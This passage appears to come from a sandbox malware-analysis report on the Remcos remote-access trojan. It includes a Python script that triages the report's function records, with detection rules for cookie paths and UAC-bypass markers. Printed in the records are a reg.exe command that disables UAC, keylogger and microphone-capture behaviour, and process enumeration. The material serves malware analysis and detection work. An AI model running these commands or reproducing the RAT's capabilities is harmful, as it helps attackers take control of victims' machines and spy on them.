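• AllocConsole.KERNEL32(02994358), ref: 0293BEB9
• ShowWindow.USER32(00000000,00000000), ref: 0293BED2
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 0293BEF7
Similarity
• API ID: Console$AllocOutputShowWindow
• String ID: Remcos v$5.3.0 Pro$CONOUT$
• Opcode ID: fd71768ef4fac957fb930b72692f3b7ba5ae7016629bdee77b8a4e3ed8b87bd7
"""

def api_name(call: str) -> str:
    """'CoGetObject.OLE32(?,...), ref: 029267E9' -> 'CoGetObject'."""
    return call.split("(", 1)[0].split(" ref", 1)[0].rsplit(".", 1)[0]

def parse_records(text: str) -> List[Dict]:
    """One dict per function; a record starts at each 'APIs' header.
    Memory-dump and snapshot lines are not needed here and are skipped."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                rec = {"apis": [], "subcalls": [], "strings": [], "similarity": {}}
                records.append(rec)
            section = line
            continue
        if rec is None:                      # text before the first record
            continue
        entry = line.lstrip("• ").strip()
        if section == "APIs":
            if entry.startswith("Part of subcall function"):   # nested callee
                rec["subcalls"].append(entry.split(": ", 1)[-1])
            else:
                rec["apis"].append(entry)
        elif section == "Strings":           # 'value, xrefs: ADDR' -> value
            rec["strings"].append(entry.rsplit(", xrefs:", 1)[0])
        elif section == "Similarity":        # 'Key: value'
            key, _, value = entry.partition(": ")
            rec["similarity"][key] = value
    return records

def record_strings(rec: Dict) -> List[str]:
    """Prefer the per-xref Strings list. The '$'-joined String ID is lossy:
    a string ending in '$' (CONOUT$) comes back as 'CONOUT' plus an empty piece."""
    if rec["strings"]:
        return list(rec["strings"])
    return [s for s in rec["similarity"].get("String ID", "").split("$") if s]

RULES = [("url", lambda s: s.startswith(("http://", "https://"))),
         ("uacme_cmstplua_marker", lambda s: "ucmCMLuaUtil" in s),
         ("browser_cookie_path", lambda s: "\\Google\\Chrome\\User Data" in s),
         ("rat_version_banner", lambda s: s.startswith("Remcos v"))]

def triage(rec: Dict) -> List[str]:
    """Tags from the record's strings and from the APIs it calls or sub-calls."""
    tags = {tag for s in record_strings(rec) for tag, pred in RULES if pred(s)}
    calls = {api_name(c) for c in rec["apis"] + rec["subcalls"]}
    if calls & {"DeleteFileA", "DeleteFileW"}:
        tags.add("file_deletion")
    if "CoGetObject" in calls:               # moniker-based COM activation
        tags.add("com_moniker_activation")
    return sorted(tags)

def summarize(text: str) -> Dict[str, Dict]:
    """Opcode ID -> API names, strings and triage tags for every record."""
    return {r["similarity"].get("Opcode ID", "?"): {"apis": [api_name(c) for c in r["apis"]],
            "strings": record_strings(r), "tags": triage(r)} for r in parse_records(text)}
```

The com_moniker_activation tag is deliberately broad: CoGetObject is the call through which a COM elevation moniker is activated, but it has ordinary uses too, so the tag is a prompt to look at the moniker string the function passes (here the pointer 029859B0 in the subcall) rather than a verdict. The combination that does match the "Contains functionality to bypass UAC (CMSTPLUA)" signature in this report's header is the UACMe marker string plus CoGetObject plus the SndVol.exe path handed to the same function.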
APIs
• __allrem.LIBCMT ref: 02959789
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029597A5
• __allrem.LIBCMT ref: 029597BC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029597DA
• __allrem.LIBCMT ref: 029597F1
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0295980F
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
• Instruction ID: 8a8a85210aba04c818f5a4a519df5a011aa35b903aff3dca25ea8f82d9bdb728
• Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
• Instruction Fuzzy Hash: CF81D172B01B26DBF724DE78CC80B6E73EEAF80764F14452AEA15D6680E774D9058BD0
APIs
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: 117e7ce6f215af7f2d9268cf0dc905363ae104521a2acdc4c6bc981a534bd3ac
• Instruction ID: b1d25f5035c5a4090b0e6d114fce660e420edea5506013d6843f0ec62e7f65ae
• Opcode Fuzzy Hash: 117e7ce6f215af7f2d9268cf0dc905363ae104521a2acdc4c6bc981a534bd3ac
• Instruction Fuzzy Hash: E551E436900206BBDB359FE8CD88FBE77FEAF89364F14522DE81596281DB35D500CA64
APIs
• Sleep.KERNEL32(00001388), ref: 02929E62
  • Part of subcall function 02929D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02929E6F), ref: 02929DCD
  • Part of subcall function 02929D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,02929E6F), ref: 02929DDC
  • Part of subcall function 02929D97: Sleep.KERNEL32(00002710,?,?,?,02929E6F), ref: 02929E09
  • Part of subcall function 02929D97: CloseHandle.KERNEL32(00000000,?,?,?,02929E6F), ref: 02929E10
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02929E9E
• GetFileAttributesW.KERNEL32(00000000), ref: 02929EAF
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 02929EC6
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 02929F40
  • Part of subcall function 0293B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02929F65), ref: 0293B633
• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,02985900,?,00000000,00000000,00000000,00000000,00000000), ref: 0292A049
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
• String ID:
• API String ID: 3795512280-0
• Opcode ID: 828aafd54d2e9782407b927cfb3fc8d29ead12d8ffe409bff5d8977027ff7a57
• Instruction ID: 0c81fc313e21a81b44b7baa6a40dbd9e6fe8a8d930f93b1c1d26224bb6eacb98
• Opcode Fuzzy Hash: 828aafd54d2e9782407b927cfb3fc8d29ead12d8ffe409bff5d8977027ff7a57
• Instruction Fuzzy Hash: 9751C1316043205BCB09FB70DC61ABF779BAFD1314F40092DE49AA71E9DF61991D8E92
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: __freea$__alloca_probe_16
• String ID: a/p$am/pm
• API String ID: 3509577899-3206640213
• Opcode ID: d7ae61a30dfc58829836ce0411ce5175ba717861a400c1d48bcb8177087b1762
• Instruction ID: b8dde0ad305cd7d0dcb6f199bba8be717ac51557efef4f58483945b87c8f6f65
• Opcode Fuzzy Hash: d7ae61a30dfc58829836ce0411ce5175ba717861a400c1d48bcb8177087b1762
• Instruction Fuzzy Hash: FED12671910206CBDB248F68C94EBBEBBFDFF45304F18415AEA05AB658D33D9940CB90
APIs
• GetLastError.KERNEL32(?,?,02957DFD,029577B1), ref: 02957E14
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02957E22
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02957E3B
• SetLastError.KERNEL32(00000000,?,02957DFD,029577B1), ref: 02957E8D
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 599e5b0323bbe1e95c4a3d3b479d0db05d5f066105d50dc22d9ff41e9321017d
• Instruction ID: 0594c3ecc56400c15a5431a863ada0615b1d89e9aa6e538c05042930741938e6
• Opcode Fuzzy Hash: 599e5b0323bbe1e95c4a3d3b479d0db05d5f066105d50dc22d9ff41e9321017d
• Instruction Fuzzy Hash: D101B13275C3359EEA24A5F87C85ABB6A5EEB41375B20072AED34590E0EF214C289780
APIs
• GetLastError.KERNEL32(?,00000000,02960A45,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966EC3
• _free.LIBCMT ref: 02966EF6
• _free.LIBCMT ref: 02966F1E
• SetLastError.KERNEL32(00000000,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966F2B
• SetLastError.KERNEL32(00000000,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966F37
• _abort.LIBCMT ref: 02966F3D
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 02ebf15cc76629c9cb4ed64f85c7f099d2cf375e9eb1dd87a962a242be715a40
• Instruction ID: 8778c90af64c761f34021fe3eb2e198bc4d7f6b6e7ded65edc74b6e8b2f8bc18
• Opcode Fuzzy Hash: 02ebf15cc76629c9cb4ed64f85c7f099d2cf375e9eb1dd87a962a242be715a40
• Instruction Fuzzy Hash: 95F02D3594870167C72276B95D0CF7F25EFAFD17B1F140528F514A2180EF38C5554910
APIs
  • Part of subcall function 02932584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 029325A6
  • Part of subcall function 02932584: RegQueryValueExW.ADVAPI32(?,0292E0BA,00000000,00000000,?,00000400), ref: 029325C5
  • Part of subcall function 02932584: RegCloseKey.ADVAPI32(?), ref: 029325CE
  • Part of subcall function 0293B15B: GetCurrentProcess.KERNEL32(?,?,?,0292C914,WinDir,00000000,00000000), ref: 0293B16C
• _wcslen.LIBCMT ref: 0293A8F6
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: CloseCurrentOpenProcessQueryValue_wcslen
• String ID: .exe$http\shell\open\command$program files (x86)\$program files\
• API String ID: 37874593-4246244872
• Opcode ID: 2fe3b5892273eafccf88118e3aa6793431e677025ea8740588481b31885b3124
• Instruction ID: aac7eb06774f61605552eecfc1c7abea21e7dbe88611e15a0c7f1b9410d40ce3
• Opcode Fuzzy Hash: 2fe3b5892273eafccf88118e3aa6793431e677025ea8740588481b31885b3124
• Instruction Fuzzy Hash: D9219262B002282BEF19BBB48C95DAE37AF9FC5354F18093DE406B72C5ED709D1D4A60
APIs
• GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0292A884
• wsprintfW.USER32 ref: 0292A905
  • Part of subcall function 02929D58: SetEvent.KERNEL32(?,?,00000000,0292A91C,00000000), ref: 02929D84
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: EventLocalTimewsprintf
• String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
• API String ID: 1497725170-248792730
• Opcode ID: 67117dc675662f8b1885811f39e9bf6e0277a50fe9be424b99b2a98b66e7a825
• Instruction ID: e4035949492ad5b92d7014788fe9d548bb7819f9e3600c7bbbaf50843ef19615
• Opcode Fuzzy Hash: 67117dc675662f8b1885811f39e9bf6e0277a50fe9be424b99b2a98b66e7a825
• Instruction Fuzzy Hash: B0116372504128AACB1CFB94EC50CFF77B9EE94321B00012EF50666194EF785A9ACAA4
APIs
• RegisterClassExA.USER32(00000030), ref: 0293CA6C
• CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0293CA87
• GetLastError.KERNEL32 ref: 0293CA91
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: ClassCreateErrorLastRegisterWindow
• String ID: 0$MsgWindowClass
• API String ID: 2877667751-2410386613
• Opcode ID: 30c22a0d31ddc700d9dc30b1ee42122aa7640f0d39e667a927e10b9faae40e6c
• Instruction ID: 665c8904352c9fbd4d9bcbe2b382f6f779a66655575bc04406191916d4ea0930
• Opcode Fuzzy Hash: 30c22a0d31ddc700d9dc30b1ee42122aa7640f0d39e667a927e10b9faae40e6c
• Instruction Fuzzy Hash: D901E5B1D1461EAB8B01DFEAD8C49EFFBBDFE49258B54052AE414F2100E7704A448BA0
APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02926A00
• CloseHandle.KERNEL32(?), ref: 02926A0F
• CloseHandle.KERNEL32(?), ref: 02926A14
Strings
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 029269F6
• C:\Windows\System32\cmd.exe, xrefs: 029269FB
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
• API String ID: 2922976086-4183131282
• Opcode ID: fdb4d207fd2ef546d4dedeca5a4ae1d543a664c51f135156d2a5503a8b82810f
• Instruction ID: d7048690b9ff10635b91dc72577f9f2ceb57d4e3d92229205501548f353867aa
• Opcode Fuzzy Hash: fdb4d207fd2ef546d4dedeca5a4ae1d543a664c51f135156d2a5503a8b82810f
• Instruction Fuzzy Hash: 87F09076D402A87ADB20AAE6DC0DFDFBF3CEBC1B10F410419BA15A6050D6705104CAB0
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0296258A,00000003,?,0296252A,00000003,0298DAE0,0000000C,02962681,00000003,00000002), ref: 029625F9
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0296260C
• FreeLibrary.KERNEL32(00000000,?,?,?,0296258A,00000003,?,0296252A,00000003,0298DAE0,0000000C,02962681,00000003,00000002,00000000), ref: 0296262F
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 0d7a03a32280e201ceeab004f47251259c4888e1079d8c966d56975719b723eb
• Instruction ID: 2588b37d7d5dce4eb6193642c05e9ee604bcf48de332f2c007e401624569c046
• Opcode Fuzzy Hash: 0d7a03a32280e201ceeab004f47251259c4888e1079d8c966d56975719b723eb
• Instruction Fuzzy Hash: 4EF08730E84209ABDB119FA5D809BADBBB8EB48755F0044A9F805A2250EB308A54CB94
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02924AED
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0292483F,00000001), ref: 02924AF9
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0292483F,00000001), ref: 02924B04
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0292483F,00000001), ref: 02924B0D
  • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
• API String ID: 2993684571-305739064
• Opcode ID: 7254256ea7afbedf7d24bf448488e2f793f15a1851ebb000262b119b9b20ab7f
• Instruction ID: 7ab91784c2510ece7e963c908ca1c9688bc2b5908c9eb7ce6f33cd40d302a52a
• Opcode Fuzzy Hash: 7254256ea7afbedf7d24bf448488e2f793f15a1851ebb000262b119b9b20ab7f
• Instruction Fuzzy Hash: ECF02B75D043506FEB1137B48C0D6FABF9DAB42320F000D2DF4A282664CA608868CB52
APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0293BF02), ref: 0293BE79
• GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0293BF02), ref: 0293BE86
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0293BF02), ref: 0293BE93
• SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0293BF02), ref: 0293BEA6
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0293BE99
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
• Opcode ID: 9ef7c17e662dd68f2ce7dbcdcfab6c73afceb012f739f9d78cb119d3c29be419
• Instruction ID: f9e65f43fa0f093fa1873e89e8e2f03548a0219081772d592acca1267a4ad574
• Opcode Fuzzy Hash: 9ef7c17e662dd68f2ce7dbcdcfab6c73afceb012f739f9d78cb119d3c29be419
• Instruction Fuzzy Hash: 26E04F73584248ABD31037F5AC4DCFB7B7CEB84612B100925F6129028AD97044588770
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 404200276d4555367548e779600983eb25dd801cd18c694adc6daedd7cec8415
• Instruction ID: 926101ebff58310b5211a055317e10987309fa1616c9a2f67feb6a7d10bd5c1b
• Opcode Fuzzy Hash: 404200276d4555367548e779600983eb25dd801cd18c694adc6daedd7cec8415
• Instruction Fuzzy Hash: AD718171908616DBCB21CB95C8C8EBEBBF9FF45365F184629E825A7180D7B09941CBA0
APIs
  • Part of subcall function 0293B15B: GetCurrentProcess.KERNEL32(?,?,?,0292C914,WinDir,00000000,00000000), ref: 0293B16C
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0292E6C1
• Process32FirstW.KERNEL32(00000000,?), ref: 0292E6E5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0292E6F4
• CloseHandle.KERNEL32(00000000), ref: 0292E8AB
  • Part of subcall function 0293B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0292E4D0,00000000,?,?,02994358), ref: 0293B19C
  • Part of subcall function 0293B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0293B395
  • Part of subcall function 0293B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0293B3A8
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0292E89C
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• String ID:
• API String ID: 4269425633-0
• Opcode ID: 30d23c001ae9414324a2b2268f3bf503255aa3c57bbf2d5d604b68886b9b2e62
• Instruction ID: 158291c78a321f5e972d20dafcf47dbc3f9892ab522c430cdef8c1d7519ae5cb
• Opcode Fuzzy Hash: 30d23c001ae9414324a2b2268f3bf503255aa3c57bbf2d5d604b68886b9b2e62
• Instruction Fuzzy Hash: 8241E2315082505BC325FB60EC60AEFB3EAAFE4310F50452DE58E86195EF70A95DCF56
APIs
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 6a628f91dc3d68fa89423bff19da0c1fb4dc23ad4d9f2e463366119044bbd459
• Instruction ID: 5c7c1fd680b322a6df5f5376679ddaf8b788970e0f41914373ad982e6f92b5d1
• Opcode Fuzzy Hash: 6a628f91dc3d68fa89423bff19da0c1fb4dc23ad4d9f2e463366119044bbd459
• Instruction Fuzzy Hash: BE41B236F002049FCB24DF78C884A6DB7F6EF85714F1685A9D915EB281DB31A901CB84
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0295E3ED,?,00000000,?,00000001,?,?,00000001,0295E3ED,?), ref: 0296FF20
• __alloca_probe_16.LIBCMT ref: 0296FF58
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0296FFA9
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,029599BF,?), ref: 0296FFBB
• __freea.LIBCMT ref: 0296FFC4
  • Part of subcall function 02966AFF: RtlAllocateHeap.NTDLL(00000000,0292E5AC,00000000,?,02953627,0292E5AC,?,02922BE9,029942E0,02922F1C,00000000,029942E0,029284A8,?,?,029942E0), ref: 02966B31
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• String ID:
• API String ID: 313313983-0
• Opcode ID: 33aa7148665baeef006cb61d6b4f8fd460edac85055bff8e4a108c6ca4deec49
• Instruction ID: 2e90e81b8a787974ba836dd9f8fa3737bc3be7d959f37cd39fe600b31b6f4e43
• Opcode Fuzzy Hash: 33aa7148665baeef006cb61d6b4f8fd460edac85055bff8e4a108c6ca4deec49
• Instruction Fuzzy Hash: 0331DE32A0021AAFDB248F64EC48EBF7BE9EF41314B050569FC15D6140EB35CD50CBA0
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0292197B
• waveInOpen.WINMM(02991AF8,000000FF,02991B00,Function_00001A8E,00000000,00000000,00000024), ref: 02921A11
• waveInPrepareHeader.WINMM(02991AC0,00000020,00000000), ref: 02921A66
• waveInAddBuffer.WINMM(02991AC0,00000020), ref: 02921A75
• waveInStart.WINMM ref: 02921A81
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
• String ID:
• API String ID: 1356121797-0
• Opcode ID: b81b0c3e31bc8c9d460c5440555ae22cdfcc16ff0dda2b2f5a5f62e805057717
• Instruction ID: d93de511089c6ef2ed5f32652da9e4cc46e6690a686bec893fe43ef7027a8b61
• Opcode Fuzzy Hash: b81b0c3e31bc8c9d460c5440555ae22cdfcc16ff0dda2b2f5a5f62e805057717
• Instruction Fuzzy Hash: 6221AE31E892029BC7049F6EB91497A7BAAFB94731700482EE11DC77A8E7B40C24CB64
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0292FBFC
• int.LIBCPMT ref: 0292FC0F
  • Part of subcall function 0292CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0292CEF1
  • Part of subcall function 0292CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0292CF0B
• std::_Facet_Register.LIBCPMT ref: 0292FC4B
• std::_Lockit::~_Lockit.LIBCPMT ref: 0292FC71
• __CxxThrowException@8.LIBVCRUNTIME ref: 0292FC8D
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID:
• API String ID: 2536120697-0
• Opcode ID: f23bba60ff1ae03b1635e4cf156a9852078c4b7152df3b7dc15f19b9d1d2dfb8
• Instruction ID: 060dd603eed1e560795fcd6cfbc2574e899804878e891691f95fb2c28e628090
• Opcode Fuzzy Hash: f23bba60ff1ae03b1635e4cf156a9852078c4b7152df3b7dc15f19b9d1d2dfb8
• Instruction Fuzzy Hash: 1711B472A00538A7CF15FBA8D940CEEB7BA9FD0764B110459E905A7184EB309F4ACBD1
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0296E144
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0296E167
  • Part of subcall function 02966AFF: RtlAllocateHeap.NTDLL(00000000,0292E5AC,00000000,?,02953627,0292E5AC,?,02922BE9,029942E0,02922F1C,00000000,029942E0,029284A8,?,?,029942E0), ref: 02966B31
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0296E18D
• _free.LIBCMT ref: 0296E1A0
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0296E1AF
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
